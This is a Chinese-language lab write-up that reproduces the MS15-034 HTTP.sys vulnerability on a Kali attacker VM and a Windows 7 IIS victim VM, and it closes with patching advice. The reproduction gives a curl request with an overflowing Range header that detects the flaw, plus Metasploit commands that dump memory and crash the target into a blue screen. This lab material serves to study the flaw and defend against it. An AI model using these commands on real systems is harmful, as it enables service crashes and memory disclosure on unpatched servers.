1、漏洞说明
远程执行代码漏洞存在于 HTTP 协议堆栈 (HTTP.sys) 中,当 HTTP.sys 未正确分析经特殊设计的 HTTP 请求时会导致此漏洞。 成功利用此漏洞的攻击者可以在系统帐户的上下文中执行任意代码。
若要利用此漏洞,攻击者必须将经特殊设计的 HTTP 请求发送到受影响的系统。 通过修改 Windows HTTP 堆栈处理请求的方式,ms15-034此更新可以修复此漏洞。更多详情https://docs.microsoft.com/zh-cn/security-updates/Securitybulletins/2015/ms15-034
2、漏洞复现
环境准备:
1)在虚拟机中准备两台虚拟机,一台为攻击者,另外一台为受害者。这里攻击者选择的是kali虚拟机,受害者选择的是window7操作系统,注意:这里的是64位的操作系统,32位的操作系统经过我自己测试无法测试成功。并确保两台机子在同一个局域网,window7关闭防火墙。
Wind7靶机ip 192.168.17.197
Kali攻击ip地址 192.168.17.195
2)在window7操作系统上搭建IIS服务,详情参考https://jingyan.baidu.com/article/2fb0ba40916a1c00f2ec5ff7.html
开始复现:
第一步:打开kali,输入命令curl http://192.168.17.197-H “192.168.17.197” -H “Range:bytes=0-18446744073709551615”,向window7http发送数据包当出现Requested Range Not Satisfiable则存在该漏洞,如图:
第二步:启动msf命令:msfconsole
然后search ms15-034
使用use auxiliary/scanner/http/ms15_034_http_sys_memory_dump模块,set RHOSTS 192.168.17.197如图
读取信息内存
进行攻击
window7蓝屏重新启动
修复意见:打上ms15-034补丁。